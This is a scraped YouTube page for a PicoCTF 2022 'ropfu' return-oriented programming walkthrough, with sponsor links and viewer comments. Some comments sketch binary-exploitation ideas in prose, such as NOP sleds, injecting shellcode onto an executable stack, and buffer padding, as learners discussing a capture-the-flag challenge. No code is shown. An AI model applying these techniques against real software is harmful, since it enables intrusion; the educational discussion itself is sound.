Return Oriented Programming (PicoCTF 2022 #48 'ropfu')
20,379
Published 2022-05-17
❤️ Support ➡ j-h.io/patreon ↔ j-h.io/paypal ↔ j-h.io/buymeacoffee
Check out the affiliates below for more free or discounted learning!
🖥️ Zero-Point Security ➡ Certified Red Team Operator j-h.io/crto
💻Zero-Point Security ➡ C2 Development with C# j-h.io/c2dev
👨🏻💻7aSecurity ➡ Hacking Courses & Pentesting j-h.io/7asecurity
📗Humble Bundle ➡ j-h.io/humblebundle
🐶Snyk ➡ j-h.io/snyk
🌎Follow me! ➡ j-h.io/discord ↔ j-h.io/twitter ↔ j-h.io/linkedin ↔ j-h.io/instagram ↔ j-h.io/tiktok
📧Contact me! (I may be very slow to respond or completely unable to)
🤝Sponsorship Inquiries ➡ j-h.io/sponsorship
🚩 CTF Hosting Requests ➡ j-h.io/ctf
🎤 Speaking Requests ➡ j-h.io/speaking
💥 Malware Submission ➡ j-h.io/malware
❓ Everything Else ➡ j-h.io/etc
All Comments (21)
-
28:25 I'm just like* why not sh(), but I was too hasty, great work john💖
-
Awesome as always my friend.
-
hey john, have you tried using the command cyclic to find the padding size for your buffer? I would recommend that if you need to find the length quicker for easier calculations. Overall a great video, and keep up the good work!
-
Currently on my binary exploitation journey and this was engaging!! Thank you John
-
NICE!~ANOTHER VIDEO LETS GO JOHN!
-
Okay, this one was really freaking cool
-
In early today, was awesome seeing you at the Ninja one summit!
-
JOHN!!!!!!
I don't really understand what you did.. but you talking us through this challenge is inspiring.. This must be what my employers think when I'm explaining things to them haha..
Love you man!! Keep doing this because I'm going to be here to watch and listen...
Maybe stay away from binary bruv :) -
There he is!
-
Hey Hey My. Hammond! Excuse any typos as I am barely awake right now. But I just wanted to ask if you knew any good reverse engineering/binary exploitation books/e-books out there. Or the best youtubers that showcase, explain, and demonstrate how binary exploit/reverse exploit works. As I have focused far more on web exploit like XSS, SSRF, LFI etc...
Thanks again as always for all the educational content and hope you continue being an inspiration!! Thanks!! -
This was really interesting!
-
Pardon my noob question but I would like to know if this exploit will work if we replace the "A" with a NOP sled.. It would automatically enter the buffer then. Would it not? We wouldn't need the short jump then
-
Sir i am getting problems in Forensics last one left in 300 pts and one 400 pts
-
Thank you for the awesome and educational video, John. I have a question that you or maybe someone else could answer (and I'll post it elsewhere too)
Considering the stack was exectuable, could you not have done the following instead of using ROP?
1. Load the shellcode for "cat flag.txt" in your initial input instead of the 500 'C' bytes
2. For your injected return address after the buffer of 'A' bytes, simply put the address (in the stack) of the shellcode you just injected
Maybe I'm missing something, but assuming that ASLR isn't enabled since you were able to discern the address of the jump instruction, you could know the address in memory of the stack location you pushed your initial input to in the first place.
Maybe I'm not making any sense, but thank you again. -
This video is just great ! How do you write a python script to solve this challenge ?
-
how did you automatically know to jmp 10
bytes forward? -
Cool, now i know that there is a Bird in my (HayStack). Nice. :)
-
I don't get it why the stack canary is not accusing * stack smashing detected * when you overflow the buffer, canary and the return address. Did I miss something?
-
interesting!
-
What is 16 bytes of nop for ? At first, I didn't use any nop instructions before the shell code and it failed. After that i tried adding 2 bytes of nop and it worked miraculously. Does it have anything to do with stack alignment ?